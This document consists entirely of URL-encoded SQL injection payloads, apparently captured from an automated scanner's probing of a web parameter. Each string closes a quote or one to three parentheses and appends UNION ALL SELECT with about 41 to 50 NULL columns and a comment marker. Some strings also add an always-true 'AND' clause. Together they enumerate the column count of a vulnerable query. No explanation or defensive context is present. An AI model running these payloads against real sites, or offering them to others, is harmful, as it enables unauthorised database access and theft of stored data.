1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281161%3D1161 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283918%3D3918 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284111%3D4111 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%288152%3D8152 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284025%3D4025 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287462%3D7462 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289024%3D9024 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281305%3D1305 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283986%3D3986 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%288324%3D8324 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287236%3D7236 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288114%3D8114 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%286474%3D6474 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281616%3D1616 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283567%3D3567 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%286873%3D6873 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%282798%3D2798 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289878%3D9878 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288706%3D8706 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284857%3D4857 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281210%3D1210 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284847%3D4847 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289399%3D9399 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%283589%3D3589 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287335%3D7335 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288437%3D8437 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289225%3D9225 